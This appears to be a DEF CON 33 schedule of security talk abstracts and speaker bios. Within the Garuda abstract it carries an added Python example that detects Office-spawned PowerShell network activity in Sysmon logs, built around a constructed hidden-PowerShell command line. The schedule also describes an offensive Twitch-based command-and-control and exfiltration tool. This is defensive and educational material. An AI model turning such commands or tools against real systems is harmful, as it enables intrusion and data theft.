Interested in malware analysis, reverse engineering, or offensive security? You know setting up a dedicated Windows analysis virtual machine is crucial, but manually installing and configuring countless tools is incredibly time-consuming and complex. Attend this 30-minute demo to discover FLARE-VM, the open-source solution from Mandiant (now part of Google Cloud) that automates this entire process. See firsthand how FLARE-VM drastically simplifies the creation of a comprehensive analysis VM packed with essential reversing and malware analysis tools. Learn why having a ready-to-go analysis environment is indispensable for so many technical cybersecurity roles and how FLARE-VM jump-starts your build!
Speakers: Joshua "jstrosch" Stroschein, Elliot Chernofsky
SpeakerBio: Joshua "jstrosch" Stroschein
Joshua is an experienced malware analyst and reverse engineer and has a passion for sharing his knowledge with others. He is a reverse engineer with the FLARE team at Google, where he focuses on tackling the latest threats. He is an accomplished trainer, providing training at places such as Ring Zero, Black Hat, DEF CON, ToorCon, Hack In The Box, SuriCon, and other public and private venues. He is also an author on Pluralsight, where he publishes content around malware analysis, reverse engineering, and other security-related topics.
SpeakerBio: Elliot Chernofsky
Elliot is a senior reverse engineer on Mandiant's FLARE team. Prior to joining the team, he worked as a software reverse engineer and vulnerability researcher for the Department of Defense. He received his master's in computer science from Georgia Tech and a bachelor's in electrical engineering from the University of South Florida. Outside of work he enjoys hiking, ping pong, and searching for the strongest coffee on the planet.
As AI becomes integral to critical systems, its vulnerabilities to adversarial attacks and data-related weaknesses pose serious risks. This interactive, one-day training is designed for AI practitioners, researchers, and security professionals to understand and mitigate these challenges. Participants will gain a comprehensive foundation in AI security, exploring adversarial attack techniques, defense mechanisms, and best practices for building robust datasets.
Speakers: Vishal "Vish" Thakur, John "Jlo" Lopes
SpeakerBio: Vishal "Vish" Thakur
Vishal Thakur is a seasoned expert in the information security industry, with extensive experience in hands-on technical roles specializing in Incident Response, Emerging Threats, Malware Analysis, and Research. Over the years, Vishal has developed a strong reputation for his deep technical expertise and ability to address complex security challenges.
He has shared his research and insights at prominent international conferences, including BlackHat, DEFCON, FIRST, and the SANS DFIR Summit, where his sessions have been highly regarded for their depth and practical relevance. Additionally, Vishal has delivered training and workshops at BlackHat and the FIRST Conference, equipping participants with cutting-edge skills and techniques. Vishal currently leads the Incident Response function for APAC region at Atlassian.
SpeakerBio: John "Jlo" Lopes
John Lopes is a passionate information security professional with specialist knowledge in digital forensics and incident response (DFIR), cyber threat intelligence, and offensive security practices. He has over 20 years of industry experience with a proven ability to help organisations defend and protect against cyber threats. John is a member of the Institute of Electrical and Electronics Engineers (IEEE), the International Information System Security Certification Consortium (ISC2), and the Information Systems Audit and Control Association (ISACA). John has worked in roles as part of the Global Incident Response Teams at Salesforce and AWS.
The Ham Radio Village is excited to return to DEF CON 33, offering you the opportunity to "Access Everything" by gaining access to the airwaves through free amateur radio license exams! Ham radio has a long history, with ham radio operators considered the original electronic hackers, innovating long before computers, integrated circuits, or even transistors were invented. The Ham Radio Village keeps this spirit alive by providing free ham radio license exams at DEF CON.
In today's world, wireless communication is essential. A fundamental understanding of radio technology is more important than ever. Earning your amateur radio license opens the door to the world of amateur radio, providing you with valuable knowledge of radio frequency (RF) technology. This knowledge can be applied to a wide range of other RF-related topics, including RFID credentials, Wi-Fi, and other wireless communication systems.
We know DEF CON and Vegas can be a lot. If you're a friend of Bill W who's looking for a meeting or just a place to collect yourself, DEF CON 33 has you covered. Join us throughout the conference in the Friends of Bill W Community Space in W301.
XSS in modern React apps isn't gone, it's just hiding in new places. In this workshop, we'll expose how React createElement can be your way in. We'll walk through several React DOM XSS lab scenarios based on real bug bounty findings from vulnerable applications in the wild. You'll see how untrusted input can make its way from a variety of realistic sources to a React createElement sink, leading to exploitable XSS, even in apps built with frameworks like Next.js. These labs are realistic, grounded in actual bugs, and designed to sharpen your ability to spot and exploit DOM XSS in the kinds of apps bounty hunters hit every day.
SpeakerBio: Nick Copi
Nick Copi is an AppSec engineer and active bug bounty hunter who regularly submits high-signal findings to notable companies. He has a diverse technical background, including building and hosting infrastructure and challenges for a couple dozen capture-the-flag and other offensive hands-on training lab events. He is a member of the CTBB Full Time Hunter's Guild and an active contributor to the online bug bounty space, always eager to share interesting ideas around other people's "nearly exploitable bugs" as well as novel attack scenarios. His hobbies include debugging minified JavaScript, grepping Blink source in hopes of discovering magical undocumented behaviors, and doing pull-ups on iframe jungle gyms.
In this hands-on workshop, participants will analyze anonymized infostealer logs to uncover the human vulnerabilities that make these attacks successful. Using privacy-preserved datasets, attendees will reverse-engineer victim decision patterns, identify high-value behavioral triggers, and craft precision-targeted attack sequences based on real-world data.
SpeakerBio: Megan Squire
Dr. Megan Squire is a researcher in cyber threat intelligence at F-Secure, a consumer-facing cybersecurity software company that focuses on scam protection. Her work tracing illicit finance and extremist influence networks has been featured in hundreds of publications including WIRED, the BBC, NPR, and Frontline.
This hands-on workshop explores the offensive and defensive security challenges of Generative AI (GenAI). In the first half, participants will use structured frameworks and rapid threat prototyping to map out real-world GenAI risks such as prompt injection, data poisoning, and model leakage. Working in teams, you'll threat model a GenAI system using simplified STRIDE, rapid threat prototyping techniques, and visual diagrams.
The second half flips the script: you'll build lightweight security tools that harness GenAI for good. No prior AI experience is required; everything is explained as we go.
This workshop is ideal for red teamers, security engineers, and curious builders. Just bring basic Python familiarity and a laptop; we'll supply the rest.
You’ll walk away with real-world threat models, working tool prototypes, and a clear framework for breaking and securing AI systems in your org.
Speakers: Ashwin Iyer, Ritika Verma
SpeakerBio: Ashwin Iyer
Ashwin Iyer is a cybersecurity architect with 12+ years of experience across red teaming, threat modeling, and cloud security. He currently leads offensive security for mergers and acquisitions at Visa Inc., conducting advanced penetration tests and threat evaluations of critical financial infrastructure.
Previously at SAP Ariba, he built and led the red team program, developing internal CTFs, defining SOC SLAs, and identifying high-impact vulnerabilities across global B2B platforms.
Ashwin is an EC-Council CodeRed instructor (Session Hijacking & Prevention), a reviewer for Hands-On Red Team Tactics (Packt), and a contributor to PCI SSC's segmentation guidance for modern networks. He has delivered hands-on workshops at BSidesSF, HackGDL, and Pacific Hackers on topics such as GenAI threat modeling and practical threat modeling for Agile teams.
He holds certifications including OSCP, OSEP, GCPN, OSMR, CTMP, and a few others. When not hacking cloud platforms or vendor portals, he's mentoring teams on how to think like attackers.
SpeakerBio: Ritika Verma, AI Security Research Assistant
Ritika Verma is a cybersecurity engineer and AI security researcher with 7.5+ years of experience across enterprise security, cloud infrastructure, and applied AI. She has led security initiatives at SAP and Accenture, where she implemented MITRE ATT&CK-based frameworks, automated detection pipelines, and secured large-scale IAM and DLP environments.
Currently pursuing her MS in Information Systems with an AI/ML focus at Santa Clara University, Ritika researches LLM security, RAG pipelines, and GenAI abuse patterns. Her open-source projects — including an AWS vulnerability triage agent (VISTA), a RAG-based compliance engine, and a CI/CD DevSecOps pipeline — reflect her obsession with bridging security engineering and real-world AI applications.
She has placed 2nd in a Pre-Defcon CTF hosted at Google, mentored future security talent through WiCyS and NIST/NICE, and served as President of the SCU AI Club. Ritika is passionate about building secure-by-default systems, mentoring women in cybersecurity, and rethinking how LLMs are evaluated and abused in production environments.
Everyone loves breaking in—but that’s just step 7 out of 10. This session explores what it really takes to run a physical pen test that's not just exciting, but also safe, smart, and worth the money for your company or client. We'll follow the full journey - from breach-focused OSINT and recon, to delivering findings that teams act on. Expect war stories, dumb mistakes, and smart takeaways as you learn how to turn a good break-in into a lasting impact.
SpeakerBio: Shawn
Too many security programs bring a clipboard to a gunfight. Shawn helps companies match and defend against the adversary's tactics, no firearms required. As an adversary for hire, Shawn leads physical red teams that test Fortune 100s, government agencies, and critical infrastructure. He started the largest physical red team in Silicon Valley and teaches security risk management and red teaming to cybersecurity graduate students. From fake badges to forged businesses, kidnapping executives to smuggling weapons, he runs ops that find the gaps in physical security before the bad guys do.
The rapid growth of cyber threats has made endpoint logging a critical component of modern security operations. Defenders increasingly rely on endpoint telemetry such as Sysmon logs to detect and investigate breaches. These logs capture crucial forensic evidence, but their sheer volume and complexity often overwhelm analysts and hinder timely and effective analysis. Garuda is an open-source PowerShell framework designed to address this challenge by providing a unified, flexible, and efficient approach to endpoint detection and response using Sysmon events. With advanced filtering capabilities, cross-event correlation, multiple contextual views, precise time-based noise reduction, and support for both remote and offline (EVTX) analysis, Garuda enables security teams to quickly uncover attack chains, investigate incidents, develop detection logic, and perform in-depth malware analysis, all within a single scriptable environment. Its extensible nature allows it to be used across scenarios including threat hunting, investigation, anomaly detection, detection engineering, and malware analysis. Garuda can accelerate investigations, improve detection, and provide deep visibility into endpoint activity.
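The cross-event correlation the abstract describes rests on one Sysmon field: every event carries the `ProcessGuid` of the process it belongs to, and Event ID 1 (process creation) also records `ParentProcessGuid`, so a network connection (Event ID 3) can be walked back to the process tree that produced it. The following is an added example written for this page, not Garuda's code (Garuda is PowerShell; this is Python over exported event XML); the six events are constructed, with made-up GUIDs and documentation-range IP addresses, and the "Office application in the ancestry" rule is one illustrative detection, not a rule from the talk.

```python
"""Correlate Sysmon process-creation and network-connection events through
ProcessGuid/ParentProcessGuid. Added example, not Garuda's code; events are constructed."""
from datetime import datetime
import xml.etree.ElementTree as ET

EVT_NS = "{http://schemas.microsoft.com/win/2004/08/events/event}"
TIME_FMT = "%Y-%m-%d %H:%M:%S.%f"  # Sysmon UtcTime format
OFFICE = ("winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe")


def parse_sysmon_xml(xml_text):
    """Yield one dict per <Event>: EventID plus every <Data Name=...> field."""
    root = ET.fromstring(xml_text)
    for ev in root.iter(f"{EVT_NS}Event"):
        rec = {"EventID": int(ev.find(f"{EVT_NS}System/{EVT_NS}EventID").text)}
        for d in ev.iter(f"{EVT_NS}Data"):
            rec[d.get("Name")] = d.text
        yield rec


def events_between(events, start, end):
    """Time-window filter on UtcTime (inclusive), the usual first noise cut."""
    lo, hi = datetime.strptime(start, TIME_FMT), datetime.strptime(end, TIME_FMT)
    return [e for e in events if lo <= datetime.strptime(e["UtcTime"], TIME_FMT) <= hi]


def process_chain(procs, guid):
    """Walk ParentProcessGuid links; returns image paths, child first."""
    chain, seen = [], set()
    while guid in procs and guid not in seen:
        seen.add(guid)
        chain.append(procs[guid]["Image"])
        guid = procs[guid].get("ParentProcessGuid")
    return chain


def find_office_spawned_network_activity(events):
    """Event 3 (network connect) whose process ancestry includes an Office app."""
    procs = {e["ProcessGuid"]: e for e in events if e["EventID"] == 1}
    hits = []
    for e in events:
        if e["EventID"] != 3:
            continue
        chain = process_chain(procs, e["ProcessGuid"])
        if any(img.lower().endswith(OFFICE) for img in chain):
            hits.append({"time": e["UtcTime"],
                         "dest": f'{e["DestinationIp"]}:{e["DestinationPort"]}',
                         "chain": " <- ".join(chain)})
    return hits


def _event(event_id, **fields):
    data = "".join(f'<Data Name="{k}">{v}</Data>' for k, v in fields.items())
    return (f'<Event xmlns="{EVT_NS[1:-1]}"><System><EventID>{event_id}</EventID></System>'
            f"<EventData>{data}</EventData></Event>")


# Constructed capture: Word launches a hidden PowerShell that calls out; Chrome is benign noise.
SAMPLE_EVENTS = "<Events>" + "".join([
    _event(1, UtcTime="2025-08-08 17:01:00.000", ProcessGuid="{guid-explorer}",
           Image=r"C:\Windows\explorer.exe", ParentProcessGuid="{guid-userinit}"),
    _event(1, UtcTime="2025-08-08 17:01:30.000", ProcessGuid="{guid-chrome}",
           Image=r"C:\Program Files\Google\Chrome\Application\chrome.exe",
           ParentProcessGuid="{guid-explorer}"),
    _event(3, UtcTime="2025-08-08 17:01:31.000", ProcessGuid="{guid-chrome}",
           DestinationIp="198.51.100.5", DestinationPort="443"),
    _event(1, UtcTime="2025-08-08 17:02:05.000", ProcessGuid="{guid-word}",
           Image=r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
           ParentProcessGuid="{guid-explorer}"),
    _event(1, UtcTime="2025-08-08 17:02:09.300", ProcessGuid="{guid-ps}",
           Image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
           CommandLine="powershell.exe -nop -w hidden -c Start-Sleep 1",
           ParentProcessGuid="{guid-word}"),
    _event(3, UtcTime="2025-08-08 17:02:11.250", ProcessGuid="{guid-ps}",
           DestinationIp="203.0.113.10", DestinationPort="443"),
]) + "</Events>"


if __name__ == "__main__":
    evs = list(parse_sysmon_xml(SAMPLE_EVENTS))
    for hit in find_office_spawned_network_activity(evs):
        print(hit["time"], hit["dest"], hit["chain"])
```

Keying on `ProcessGuid` rather than on PID matters because PIDs are reused within a boot; the GUID is unique per process instance, which is what makes a chain reconstructed from offline EVTX trustworthy. The same walk extends to Event IDs 11 (file create), 22 (DNS) and 13 (registry) without changes, since they all carry `ProcessGuid`.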
Speakers: Monnappa "Monnappa22" K A, Sajan Shetty
SpeakerBio: Monnappa "Monnappa22" K A
Monnappa K A is a security professional with over 17 years of experience in incident response and investigation. He previously worked for Microsoft and Cisco as a threat hunter, mainly focusing on threat hunting, investigation, and research of advanced cyber attacks. He is the author of the best-selling book "Learning Malware Analysis." He is a review board member for Black Hat Asia, Black Hat USA, and Black Hat Europe. He is the creator of the Limon Linux sandbox and the winner of the Volatility Plugin Contest 2016. He co-founded the cybersecurity research community "Cysinfo" (https://www.cysinfo.com). He has conducted training sessions on malware analysis, reverse engineering, and memory forensics at Black Hat Asia, Black Hat USA, Black Hat Europe, Black Hat SecTor, Black Hat Middle East, Black Hat Spring, BruCON, HITB, FIRST, SEC-T, OPCDE, and the 4SICS-SCADA/ICS cybersecurity summit. He has presented at various security conferences, including Black Hat, FIRST, SEC-T, the 4SICS-SCADA/ICS summit, DSCI, the National Cyber Defence Summit, and Cysinfo meetings, on topics related to memory forensics, malware analysis, reverse engineering, and rootkit analysis. He has also authored articles in eForensics and Hakin9 magazines. You can find some of his contributions to the community on his YouTube channel (http://www.youtube.com/c/MonnappaKA), and you can read his blog posts at https://cysinfo.com.
SpeakerBio: Sajan Shetty
Sajan Shetty is a cyber security enthusiast. He is an active member of Cysinfo, an open cyber security community (https://www.cysinfo.com) committed to educating, empowering, inspiring, and equipping cybersecurity professionals and students to better fight and defend against cyber threats. He has conducted training sessions at Black Hat Asia, Black Hat USA, Black Hat Europe, Black Hat SecTor, Black Hat Middle East, Black Hat Spring, BruCON, and HITB, and his primary fields of interest include machine learning, malware analysis, and memory forensics. He holds various certifications in machine learning and is passionate about applying machine learning techniques to solve cybersecurity problems.
In this talk we will outline the various layers of security in payment systems and the use of generative AI for "fuzz testing" these systems. We will cover image and video manipulation, testing unusual combinations of security elements in payment messages, and testing various risky-behaviour scenarios in common payment types, in both fraud and money laundering settings.
Speakers: Karthik Tadinada, Martyn Higson
SpeakerBio: Karthik Tadinada
Karthik is the founder and CEO of Fortify Solutions, a provider of fraud and financial crime prevention solutions. Karthik has over a dozen years of experience in building fraud prevention systems at international scale, having built systems for IATA, EF… (the debit card network of Australia), TSYS, and WorldPay.
SpeakerBio: Martyn Higson, CTO at Fincrime Dynamics
Martyn is CTO at Fincrime Dynamics, a synthetic data company for the prevention of fraud and financial crime. Martyn was responsible for deploying major fraud prevention systems in his prior roles at Featurespace.
War stories and bad moves from those in the field.
Speakers: Graham Helton, Kevin Clark, Red Team Village Staff, Skyler Knecht
SpeakerBio: Graham Helton
Graham Helton is currently a Red Team Specialist at Google specializing in Linux exploitation. Graham posts frequently on his website grahamhelton.com with deep dives on various security-related topics. In his free time he likes to pretend like he knows what he's doing, coffee, and cooking.
SpeakerBio: Kevin Clark, Red Team Instructor at BC Security
Kevin Clark is a Security Consultant with TrustedSec and a Red Team Instructor with BC Security, with a diverse background in software development, penetration testing, and offensive security operations. Kevin specializes in initial access techniques and Active Directory exploitation. He has contributed to open-source projects such as PowerShell Empire and developed custom security toolkits, including Badrats and Ek47. A skilled trainer and speaker, Kevin has delivered talks and conducted training sessions all over the country at cybersecurity conferences, including Black Hat and DEF CON, and authors a cybersecurity blog at https://henpeebin.com/kevin/blog.
SpeakerBio: Red Team Village Staff
SpeakerBio: Skyler Knecht
Skyler is a Senior Security Consultant at SpecterOps, where he performs security assessments for Fortune 500 organizations. With over six years of experience, he focuses on initial access research and contributes to the security community through open-source development and conference presentations. Skyler has presented at DEF CON and BSides and actively collaborates on open-source projects such as Messenger, Ek47, Connect, and Metasploit. He also conducts vulnerability research, having discovered multiple zero-day vulnerabilities in enterprise software.
Yaroslav Vasinskyi was sentenced in 2024 to 13 years in U.S. federal prison for his role in the $700M Kaseya ransomware attack. But behind the headlines lies a more human and complex story. Over the past year, threat researcher Jon DiMaggio built a relationship with Vasinskyi, speaking with him regularly by phone and email. Joining him is John Fokker, Head of Threat Intelligence at Trellix and former Dutch cybercrime investigator involved in operations targeting the REvil gang with global law enforcement.
This talk reveals how REvil operated from the inside, what really happened behind the Kaseya attack, and how ego, greed, and betrayal tore the crew apart. The session also provides new information on the group’s leadership, who vanished and remain at large.
This isn’t theory or speculation. It is raw human intelligence, operational insight, and criminal context behind one of the most devastating ransomware attacks in history. It also tells Vasinskyi’s personal journey, revealing the often overlooked human side of ransomware crime.
Coinciding with the next Ransomware Diaries release, this talk exposes the inner workings and unraveling of one of the most infamous ransomware groups of all time. This is not a glorification, it is a reckoning.
Jon DiMaggio is the Chief Security Strategist at Analyst1 and a cybercrime hunter who doesn’t just follow ransomware gangs, he infiltrates them. A former U.S. intelligence analyst with a background in signals intelligence, Jon has spent his career going deep undercover inside some of the world’s most dangerous cybercrime syndicates. In 2024, he embedded himself within the notorious LockBit ransomware gang, gathering intelligence that helped law enforcement take down one of the most prolific cybercriminal operations in history.
His investigative series The Ransomware Diaries exposed LockBit’s inner workings and earned widespread recognition. Jon is the author of The Art of Cyberwarfare (No Starch Press), a two-time SANS Difference Makers Award winner, has appeared on 60 Minutes, and has been featured in The New York Times, Wired, and Bloomberg. He is also a regular speaker at DEFCON, RSA, and other major security conferences. Whether he’s chasing cybercriminals or telling their stories, Jon brings the kind of firsthand insight you only get when you’ve walked into the lion’s den, and walked out.
SpeakerBio: John Fokker
As Head of Threat Intelligence at Trellix and former head of cyber investigations at the Dutch National High Tech Crime Unit, I bring deep technical knowledge and operational experience bridging law enforcement, intelligence, and private sector perspectives. My work has helped coordinate international takedowns of ransomware infrastructure, and I have direct experience investigating REvil and its affiliates at the height of their operations. My contribution complements Jon’s HUMINT narrative with:
• Technical validation of the behind-the-scenes activities discussed in the talk
• Law enforcement and intelligence insights on affiliate operations, infrastructure, and monetization patterns
• An investigative trail linking REvil and GandCrab, through shared TTPs and operational overlaps
Together, our presentation fuses Hacking, CTI, HUMINT and investigative storytelling with forensic rigor, revealing how trust, betrayal, and ego brought down one of the most feared ransomware gangs in the world.
Glytch is a post-exploitation tool serving as a command-and-control and data exfiltration service. It creates a covert channel through the Twitch live streaming platform and lets attackers execute OS commands or exfiltrate data of any kind from the target computer, regardless of whether the computers are connected over a LAN or a WAN.
Speakers: Anil Celik, Emre Odaman
Anil graduated as a computer engineer and is currently an MSc student in information security engineering. He has 5+ years of professional experience and is working as a cyber security engineer at HAVELSAN, primarily focused on red team engagements and purple teaming. He holds 5+ CVEs and has OSCP and OSWP certifications.
SpeakerBio: Emre Odaman
Emre graduated as a Computer Engineer and has been working as a Cyber Security Engineer at HAVELSAN, a major defense industry company in Türkiye, for the past 3 years. His main areas of interest are red teaming, network security, OT, IoT and hardware security.
Over the past few years, we've really seen API hacking take off as a field of its own, diverging from typical web app security yet parallel to it. Often we point to the amorphous blob that is web security and say: "here you go, now you can be a hacker too", with top 10 lists, write-ups, conference talks and whitepapers, smiling as we do. This creates a major challenge for developers who want to test their APIs for security, or for people who just want to get into API hacking: how on earth do you wade through all the general web security to get to the meat of API hacking, and what do you even need to know? This talk is going to break down API hacking from a developer point of view, teaching you everything you need to know about API hacking: from the bugs you can find, to the impact you can cause, to how you can easily test your own work or review your peers' work. So what are you waiting for? Join me and go hack yourself!
SpeakerBio: Katie "InsiderPhD" Paxton-Fear, Principal Security Researcher at Traceable by Harness
Dr Katie Paxton-Fear is an API security expert and a Security Advocate at Semgrep; in her words: she used to make applications and now she breaks them. A former API developer turned API hacker, she has found vulnerabilities in organizations ranging from the Department of Defense to Verizon, with simple API vulnerabilities. Dr Katie has been a featured expert in the Wall Street Journal, BBC News, ZDNet, The Daily Swig and more. She shares some of the easy ways hackers can exploit APIs and how they get away without triggering a security alert. Dr Katie regularly delivers security training and security research to some of the largest brands worldwide. She combines easy-to-understand explanations with key technical details that turn security into something everyone can get.
Returning for their 8th year, Gothcon invites you to come dance the night away with a line-up of some of the community's best dark dance music DJs from across the US! Dress however you would like in whatever makes you feel comfortable and happy, and all are welcome.
Join the founding members of Red Team Village as they share what they’ve learned building a community focused on offensive security education and discuss their evolution from hands-on leaders to mentors and advisors. From starting as a DEF CON village to growing into a 20,000+ member community, the founders will explore the complexities of building a successful community as well as the transition to letting others lead day-to-day operations.
This session covers the practical realities of community building and leadership evolution - managing volunteers, scaling membership, balancing content for different skill levels, and maintaining community culture during growth. The founders will share what worked in running the village operations, handling logistics at scale, and responding to community feedback to continuously improve the experience.
The discussion will address key questions about running and transitioning technical communities: How do you manage village operations effectively? What have you learned about scaling community management? How do you handle criticism and feedback constructively? How do you identify and develop new leaders? When and how do you step back without losing community culture? The founders will also cover practical aspects like managing large-scale events and evolving with community needs.
The session wraps up with Q&A where you can explore specific challenges around building technical communities, leadership transitions, and maintaining founding vision while empowering new voices.
Whether you’re involved in community building, thinking about starting something new, or wondering about sustainable leadership models, this panel offers honest perspectives from founders navigating the transition from builders to advisors.
Speakers: Barrett Darnell, Mike Lisi, Omar Santos, Savannah Lazzara, Wes Thurner
Mike Lisi is the founder of Maltek Solutions, a consulting and solutions company, as well as a seasoned professional in the field of cybersecurity. Mike is known for his expertise in network, web application, and API penetration testing, his contributions toward Capture The Flag (CTF) events, and support for college cybersecurity competitions. As the founder of Maltek Solutions, Michael has carved a path of excellence, establishing a dynamic and innovative cybersecurity company. His leadership and technical expertise drive Maltek Solutions to deliver top-notch security solutions to customers and partners throughout the country.
SpeakerBio: Omar Santos
Omar Santos is an active member of the security community, where he leads several industry-wide initiatives and standard bodies. Omar is a Distinguished Engineer at Cisco focusing on artificial intelligence (AI) security, cybersecurity research, incident response, and vulnerability disclosure. He is a board member of the OASIS Open standards organization and the founder of OpenEoX. Omar is the co-chair of the Coalition of Secure AI (CoSAI). Omar's collaborative efforts extend to numerous organizations, including the Forum of Incident Response and Security Teams (FIRST) and the Industry Consortium for Advancement of Security on the Internet (ICASI). Omar is the co-chair of the FIRST PSIRT Special Interest Group (SIG). Omar is the co-founder of the DEF CON Red Team Village and the chair of the Common Security Advisory Framework (CSAF) technical committee.
Omar is the author of over 25 books, 21 video courses, and over 50 academic research papers. Omar is a renowned expert in ethical hacking, vulnerability research, incident response, and AI security. He employs his deep understanding of these disciplines to help organizations stay ahead of emerging threats. His dedication to cybersecurity has made a significant impact on technology standards, businesses, academic institutions, government agencies, and other entities striving to improve their cybersecurity programs. Prior to Cisco, Omar served in the United States Marines focusing on the deployment, testing, and maintenance of Command, Control, Communications, Computer and Intelligence (C4I) systems.
SpeakerBio: Savannah Lazzara
Savannah Lazzara is a Security Engineer specializing in red teaming at a tech company. Savannah has multiple years of experience in security consulting working with many Fortune 500 corporations and has experience in carrying out security assessments, which include network assessments, social engineering exercises, physical facility penetration tests, and wireless assessments. Savannah also has experience in performing adversary simulation assessments, which include remote red team simulations, insider threat assessments, and onsite red team assessments. Savannah's area of expertise is focused on social engineering and physical security.
Savannah is a member of the Advisory Board for Red Team Village and co-authored ‘Redefining Hacking: A Comprehensive Guide to Red Teaming and Bug Bounty Hunting in an AI-Driven World’. She has spoken at several cybersecurity conferences, including Source Zero Con, BSides, and more. Savannah has also appeared on multiple podcasts, including The Hacker Factor and Hackerz and Haecksen.
SpeakerBio: Wes Thurner
This Pac-Man themed set of challenges takes Players on a journey through learning and demonstrating hacker and information security skills to earn points. With multiple subject-matter specific challenge groups and tracks, this hacker challenge game has something for everyone. Players will only be able to turn in scavenger hunt items during Contest Area Operating Hours.
What is Hack3r Runw@y?
Hack3r Runw@y challenges creative minds in the hacker community to reimagine fashion through the lens of hacking. We're calling all glamorous geeks, crafty coders, and fashionably functional folks to dust off their soldering irons, grab their needles and threads, and unleash their inner designers. Whether you're a seasoned maker or a coding newbie, Hack3r Runw@y has a place for you. Hint: You don't have to know how to program to make cool wearables.
What to Expect:
Participants will submit their creations prior to the event and then walk the runway during our allotted time at DEF CON. Audience should be prepared to be amazed by a runway show unlike any other. Like really. Witness creations that push the boundaries of fashion and technology, showcasing the ingenuity and resourcefulness of the hacker community.
Expect to see:
Smart Wear that Wows: Garments integrated with LEDs, microcontrollers, sensors, and other tech wizardry, creating dazzling displays of functionality and style.
Digital Design that Dazzles: Visually stunning pieces that use light, color, and texture to create captivating, passive designs.
Functional Fashion: Practical and stylish creations that solve real-world problems, from masks and shields to lockpick earrings and cufflink shims.
Extraordinary Style: Unique and expressive designs that push the boundaries of fashion, incorporating everything from 3D textures and optical illusions to cosplay and security-inspired patterns.
A Hacker Perspective on Fashion:
Hack3r Runw@y brings a unique hacker perspective to DEF CON by demonstrating the power of creativity and problem-solving in a non-traditional context. It showcases how hacking can be applied to art and self-expression, blurring the lines between technology, fashion, and culture. It's about more than just making cool gadgets; it's about pushing boundaries, challenging conventions, and exploring the intersection of technology and human experience.
What You'll Learn:
Hack3r Runw@y offers attendees a glimpse into the creative potential of the hacker community. You'll see firsthand how technical skills can be combined with artistic vision to create truly unique and innovative designs. You'll be inspired by the ingenuity and resourcefulness of the participants, and you might even pick up some ideas for your own projects. It's a chance to learn about new technologies, see them applied in unexpected ways, and connect with a community of like-minded individuals. Hack3r Runw@y teamed up with the DC Maker Community during DEF CON 32 to offer a workshop on sewing LEDs to clothing. Look out for something similar this year.
The Competition:
Participants will compete in four categories for a chance to win in each, plus the coveted People’s Choice trophy, where anyone can win, but there will be a twist! Our esteemed judges will select winners based on:
Join us at DEF CON 33 for Hack3r Runw@y and witness the future of fashion! Be prepared to be amazed, inspired, and maybe even a little bit hacked. This is an event you won't want to miss!
There are no prerequisites outside of you wearing something that you made or had a hand in making. You are welcome to model store bought outfits, but you will not qualify for a prize.
Proof that you created the item and signed up via the Google form. Submissions due no later than 4pm EST on Saturday, August 10, 2024. Link to form found here: https://hack3rrunway.github.io/
Have you ever wondered what would happen if you took ostensibly smart people, put them up on a stage, maybe provided a beer or two and started asking really tough technical questions like what port Telnet runs on? Well wonder no more! Back to start its 31st year at Defcon, Hacker Jeopardy will have you laughing, groaning and wondering where all the brain cells have gone. So come share an evening of chanting DFIU followed immediately by someone FIU. This is a mature show, 18+.
Two great things that go great together! Join the fun as your fellow hackers make their way through songs from every era and style. Everyone has a voice and this is your opportunity to show it off! Everyone is encouraged to participate in this DEF CON tradition, open to all folks and skill levels.
Enter the Hacker Troll House to take on a variety of entry-level Linux security challenges against the Trolls. The Hacker Troll House challenges are short, timed, and will require you to think on your feet to beat the Trolls at their own game. But be warned, Trolls don't play fair! Basic Linux command line and file system knowledge recommended (bash scripting a plus).
SpeakerBio: James Rice
Mr. James Rice has been cybersecurity faculty for the last decade in Upstate New York at Mohawk Valley Community College and more recently Rochester Institute of Technology. During this time, Mr. Rice has focused on developing numerous interactive gamified learning scenarios for the classroom and cyber competitions such as the NSA sponsored NCAE Cyber Games. Mr. Rice is currently pursuing his PhD at RIT in Computer Engineering and researching how to best leverage immersive reality technologies for data visualization and interaction, primarily in cyberspace.
The Internet is a dangerous place. Fortunately, hackers have created tools to make it safer. VPNs anonymize traffic but still expose IP addresses. Companies claim not to log, but how quickly will they hand over our data when they receive a warrant? Tor networks reroute traffic, but performance suffers as a result. Can we trust these distributed networks? Who owns the exit nodes? Finally, apps like Signal offer E2EE secure comms but in a proprietary and siloed way. Open source means very little if an app operates in a Walled Garden. Are there back doors? Is our data really safe?
In this workshop we'll create a Hacker VPN that combines the best of VPNs, Tor, and E2EE secure comms apps. We'll use modern-day PQC encryption to implement a secure protocol. We'll use both TCP/UDP as our network protocols to demonstrate flexibility in design. We'll support packet sharding, random noise injection, multi-hop routing, and 100% anonymity between network endpoints. We'll do all this on Linux with standard C++, CMake & OpenSSL. At the end of this workshop you'll have all the tools you need to take the Hacker VPN to the next level. Why trust outdated software from shady companies when you can build your own modern day, kick-ass implementation?
Yes, the Internet is a dangerous place. But it's much safer when we take control.
Speakers: Eijah, Benjamin "Cave Twink" Woodill
Eijah is the founder of Code Siren, LLC and has 25+ years of experience in software development. He is the creator of Polynom, the world's first CNSA Suite 2.0 PQC collaboration app. He is also the developer of Demonsaw, an encrypted communications platform that allows you to share information without fear of data collection or surveillance. Before that Eijah was a Lead Programmer at Rockstar Games where he created Grand Theft Auto V and Red Dead Redemption 2. In 2007, Eijah hacked multiple implementations of the Advanced Access Content System (AACS) protocol and released the first Blu-ray device keys under the pseudonym, ATARI Vampire. He has been a faculty member at multiple colleges, has spoken at DEF CON and other security conferences, and holds a master’s degree in Computer Science. Eijah is an active member of the hacking community and is an avid proponent of Internet freedom.
SpeakerBio: Benjamin "Cave Twink" Woodill
Benjamin is a technology professional and lifelong hacker whose journey began with an Amiga 1000 and an endless sense of curiosity. He taught himself how to keep it running—troubleshooting, repairing failed components, and learning the ins and outs of the machine. From there, he moved on to DOS on a Packard Bell and eventually to building custom systems. That early hands-on experience evolved into a career spanning multiple industries and roles, where he designed, deployed, and managed complex networks and systems. While hardware remains a passion, his current work focuses on secure communications and building tools for resilient network infrastructure. When he’s not buried in RFCs, technical docs, or writing integrations, Benjamin is likely rock climbing or exploring underwater cave systems—boldly going where no man has gone before.
